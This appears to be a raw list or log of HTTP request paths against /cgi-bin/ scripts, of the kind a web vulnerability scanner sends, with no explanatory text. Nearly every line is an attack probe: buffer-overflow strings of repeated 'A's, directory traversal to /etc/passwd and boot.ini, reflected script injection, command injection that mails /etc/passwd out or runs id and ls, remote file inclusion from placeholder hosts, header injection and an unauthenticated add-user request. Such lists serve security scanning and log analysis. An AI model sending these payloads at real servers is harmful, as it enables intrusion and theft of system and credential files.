AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/cgi-bin/.cobalt/alert/service.cgi?service=3D%3Cscript%=3Ealert('CSS')%3C/script%3E
/cgi-bin/.cobalt/alert/service.cgi?service=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/cgi-bin/.cobalt/cpuUsage/loadavg.cgi
/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28826%29%3C/script%3E
/cgi-bin/.cobalt/networker/networker.cgi
/cgi-bin/.cobalt/siteUserMod.cgi
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/.cobalt/sysManage/../../../../../../../../../../../../etc/passwd
/cgi-bin/.cobalt/telnetUsage/telnetUsage.cgi
/cgi-bin/.DS_Store
/cgi-bin/.FBCIndex
/cgi-bin/.fhp
/cgi-bin/.forward
/cgi-bin/.htaccess
/cgi-bin/.htaccess.old
/cgi-bin/.htaccess.save
/cgi-bin/.htaccess~
/cgi-bin/.htpasswd
/cgi-bin/.namazu.cgi
/cgi-bin/.nsconfig
/cgi-bin/.passwd
/cgi-bin/.wwwacl
/cgi-bin/.www_acl
/cgi-bin///test.cgi
/cgi-bin//ans/ans.pl?p=../../../../../usr/bin/id|&blah
/cgi-bin//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/cgi-bin//board.cgi
/cgi-bin//DCShop/Auth_data/auth_user_file.txt
/cgi-bin//errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
/cgi-bin//GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin//GWWEB.EXE?HELP=bad-request
/cgi-bin//mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
/cgi-bin//mt-static/
/cgi-bin//mt-static/mt-check.cgi
/cgi-bin//mt-static/mt-load.cgi
/cgi-bin//mt/mt.cfg
/cgi-bin//NoneExistent%0d%0aInjectedHeadernjectedValue
/cgi-bin//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin//rightfax/fuwww.dll/?
/cgi-bin//scripts/*%0a.pl
/cgi-bin//Sites/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
/cgi-bin//Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
/cgi-bin//Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
/cgi-bin//Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
/cgi-bin//Sites/Samples/Knowledge/Push/ViewCode.asp?file=index.asp
/cgi-bin//Sites/Samples/Knowledge/Search/ViewCode.asp?file=index.asp
/cgi-bin//siteserver/publishing/viewcode.asp?file=index.asp
/cgi-bin//th1s1sanonexistantf1l3.1224703652
/cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
/cgi-bin//_vti_pvt/doctodep.btr
/cgi-bin/000nonexistentfile.pl
/cgi-bin/14all-1.1.cgi
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/884973308.old
/cgi-bin/?M=A
/cgi-bin/?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
/cgi-bin/a1stats/a1disp3.cgi
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp4.cgi
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
/cgi-bin/aaaaaa/../test.cgi
/cgi-bin/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/../test.cgi
/cgi-bin/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/cgi-bin/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/cgi-bin/abcdefgh
/cgi-bin/abracadabra.bat
/cgi-bin/abracadabra.cmd
/cgi-bin/abuse.man?file=&domain=&script=
/cgi-bin/access.log
/cgi-bin/access_log
/cgi-bin/accounts.asp
/cgi-bin/ackcmdc.exe
/cgi-bin/action.php?action=addcomment
/cgi-bin/ad.cgi
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/cgi-bin/adcycle
/cgi-bin/adcycle/adcenter.cgi
/cgi-bin/addbanner.cgi
/cgi-bin/addpinuser.cgi
/cgi-bin/adduser.cgi
/cgi-bin/add_category.asp
/cgi-bin/add_ftp.cgi
/cgi-bin/add_ftp.pl
/cgi-bin/add_user.cgi
/cgi-bin/admcgi/scripts/Fpadmcgi.exe
/cgi-bin/admin.asp
/cgi-bin/admin.cfg
/cgi-bin/admin.cgi
/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
/cgi-bin/admin.conf
/cgi-bin/admin.dat
/cgi-bin/admin.data
/cgi-bin/admin.db
/cgi-bin/admin.dbf
/cgi-bin/admin.exe
/cgi-bin/admin.htm
/cgi-bin/admin.html
/cgi-bin/admin.htx
/cgi-bin/admin.ini
/cgi-bin/admin.lst
/cgi-bin/admin.php
/cgi-bin/admin.php3
/cgi-bin/admin.pl
/cgi-bin/admin.pw
/cgi-bin/admin.txt
/cgi-bin/admin/admin
/cgi-bin/admin/admin.cgi
/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/cgi-bin/admin/admin_ug_auth.php
/cgi-bin/admin/classes/minixml/classes/doc.inc.php
/cgi-bin/admin/classes/minixml/classes/element.inc.php
/cgi-bin/admin/classes/minixml/classes/node.inc.php
/cgi-bin/admin/setup.cgi
/cgi-bin/admin/sqlbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/adminhot.cgi
/cgi-bin/admins.htx
/cgi-bin/adminwww.cgi
/cgi-bin/admin_/
/cgi-bin/admin_/help/..%255Cplsql.conf
/cgi-bin/adovbs.inc
/cgi-bin/adpassword.txt
/cgi-bin/ads.cgi
/cgi-bin/advwedadmin/sqlbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/af.cgi
/cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/cgi-bin/af.cgi?_browser_out=|id|
/cgi-bin/aglimpse
/cgi-bin/aglimpse 
/cgi-bin/aglimpse.cgi
/cgi-bin/aglimpse.cgi/80|IFS=5;CMD=5mail5test\@test.com\</etc/passwd;eval$CMD;echo
/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5test\@test.com\</etc/passwd;eval$CMD;echo
/cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
/cgi-bin/aglimpse|aglimpse|
/cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/alibaba.pl
/cgi-bin/alibaba.pl?|dir%20..\\..\\..\\..\\..\\..\\..\\,
/cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
/cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/cgi-bin/aliredir.exe
/cgi-bin/allmanage.pl
/cgi-bin/allmanageup.pl
/cgi-bin/alya.cgi
/cgi-bin/amadmin.pl
/cgi-bin/amadmin.pl?setpasswd
/cgi-bin/amlite/amadmin.pl
/cgi-bin/anacondaclip
/cgi-bin/anacondaclip.cgi
/cgi-bin/anacondaclip.pl
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgi-bin/anacondaclip.pl?template=check
/cgi-bin/AnForm2
/cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
/cgi-bin/ans.pl?p=../../../../bin/command
/cgi-bin/AnyBoard.cgi
/cgi-bin/AnyForm
/cgi-bin/anyform.cgi
/cgi-bin/AnyForm2
/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgi-bin/application.cfm
/cgi-bin/archie
/cgi-bin/architext_query
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/article.php?sid=""><script>alert('XSS')</script>"
/cgi-bin/ash
/cgi-bin/asp/samples/viewcode.asp?file=index.asp
/cgi-bin/aspupload/Test11.asp
/cgi-bin/aspuploads/Test11.asp
/cgi-bin/astrocam.cgi
/cgi-bin/as_web.exe?Command=search&file=nonexistantfile&request=&MaxHits=10&NumLines=1
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/athcgi.exe?command=showpage&script=
/cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Hello%20there!');a=[['
/cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('XSS');a=[['"
/cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/cgi-bin/auction.cgi?searchstring=<script>alert('CSS')</script>&action=SearchProductByKeyword
/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=&Where=&Sort=Photo&Dir=
/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('CSS')</script>&Where=&Sort=Photo&Dir=
/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script>&Where=&Sort=Photo&Dir=
/cgi-bin/auctionweaver.cgi
/cgi-bin/auctionweaver.pl
/cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
/cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd
/cgi-bin/auktion.pl
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
/cgi-bin/auktion.pl?menue=../../../../../../../../etc/passwd
/cgi-bin/auth.cgi
/cgi-bin/authenticate.cgi
/cgi-bin/auth_data/auth_user_file.txt
/cgi-bin/awebvisit.stat
/cgi-bin/awl/auctionweaver.cgi
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/cgi-bin/awstats.pl
/cgi-bin/awstats.pl?configdir=
/cgi-bin/ax-admin.cgi
/cgi-bin/ax-admin.pl
/cgi-bin/ax.cgi
/cgi-bin/ax.cgi?debugme
/cgi-bin/ax.pl?debugme
/cgi-bin/axs.cgi
/cgi-bin/axs.dat
/cgi-bin/badmin.cgi
/cgi-bin/banner.cgi
/cgi-bin/bannereditor.cgi
/cgi-bin/bannereditor.pl
/cgi-bin/bash
/cgi-bin/batch_add.asp
/cgi-bin/batch_manage.asp
/cgi-bin/BatMail.exe
/cgi-bin/bb-ack.sh
/cgi-bin/bb-hist
/cgi-bin/bb-hist.sh
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/bbs.pl%3F+.htr
/cgi-bin/bbs_forum.cgi
/cgi-bin/bb_smilies.php3
/cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/cgi-bin/bdir.htr
/cgi-bin/betsie/parserl.pl/
/cgi-bin/bgplg?cmd=show%2Bversion%3Cscript%3Ealert%2810366%29%3C%2Fscript%3E
/cgi-bin/bigconf.cgi
/cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/master.passwd&filters=
/cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20test@@test.com|&f6=^a.*&action=searchdbdisplay
/cgi-bin/blah/classifieds/admin.cgi
/cgi-bin/blat.exe
/cgi-bin/blog/
/cgi-bin/blog/mt-check.cgi
/cgi-bin/blog/mt-load.cgi
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/bnbsurvey.cgi
/cgi-bin/board.cgi
/cgi-bin/board.cgi  
/cgi-bin/Board/db/
/cgi-bin/board/search.cgi
